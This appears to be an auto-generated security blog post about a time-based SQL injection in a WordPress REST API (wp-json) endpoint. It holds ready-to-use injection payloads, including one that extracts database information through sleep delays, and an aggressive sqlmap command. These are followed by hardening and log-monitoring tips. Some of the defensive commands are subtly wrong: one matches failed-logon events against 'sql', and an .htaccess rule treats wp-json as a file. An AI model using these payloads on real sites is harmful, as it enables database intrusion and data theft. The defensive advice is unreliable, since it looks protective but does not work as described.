Critical Time-Based SQL Injection in WP-JSON Endpoint

By /

Listen to this Post

Featured Image
Just Found one CRITICAL Time-Based SQL Injection on a `wp-json` endpoint using the payload: 

'%2b(selectfrom(select(sleep(10)))a)%2b'

This vulnerability allows attackers to manipulate database queries by inducing delays, confirming SQL injection when the server response is delayed by 10 seconds.

You Should Know:

1. Exploiting Time-Based SQL Injection

To test for time-based SQLi manually:

' OR IF(1=1,SLEEP(10),0)-- -
' OR IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)-- -

Automated testing with sqlmap:

sqlmap -u "https://example.com/wp-json/some-endpoint?param=1" --technique=T --time-sec=10 --risk=3 --level=5

2. WordPress Security Hardening

  • Disable unnecessary REST API endpoints: 
    add_filter('rest_endpoints', function($endpoints) {
if (!current_user_can('administrator')) {
unset($endpoints['/wp/v2/users']);
}
return $endpoints;
});
  • Use a Web Application Firewall (WAF) like ModSecurity to block SQLi attempts.

3. Detection & Mitigation

  • Log Monitoring: Check for repeated `sleep()` or `benchmark()` calls in logs. 
    grep -i "sleep(.)" /var/log/apache2/access.log
  • Patch Plugins/Themes: Outdated WordPress components often introduce SQLi flaws.

4. Advanced Exploitation

Extract database information with time delays:

' UNION SELECT IF(SUBSTRING(user(),1,4)='root',SLEEP(10),NULL),NULL,NULL-- -

5. Defensive Commands

  • Linux Log Analysis: 
    journalctl -u apache2 --since "1 hour ago" | grep -i "sql"
  • Windows Event Log (PowerShell): 
    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4625} | Where-Object {$_.Message -like "sql"}

What Undercode Say

Time-based SQLi remains a stealthy threat, bypassing traditional error-based detection. Always:
– Sanitize inputs using prepared statements.
– Limit API access via .htaccess: 

<Files "wp-json">
Order Deny,Allow
Deny from all
Allow from 192.168.1.0/24
</Files>

– Automate scanning with Burp Suite or OWASP ZAP.

Expected Output:

A secured WordPress REST API with:

  • No delayed responses to crafted SQL payloads.
  • WAF rules blocking sleep(), benchmark(), and union queries.
  • Regular audits via: 
    nikto -h https://example.com/wp-json -C all

Prediction

As WordPress evolves, attackers will shift to blind SQLi in REST APIs. Future exploits may combine JSON hijacking with time-based delays, demanding stricter CSP headers and API rate-limiting.

URLs for further reading:

References:

Reported By: Kunal Dhumal – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: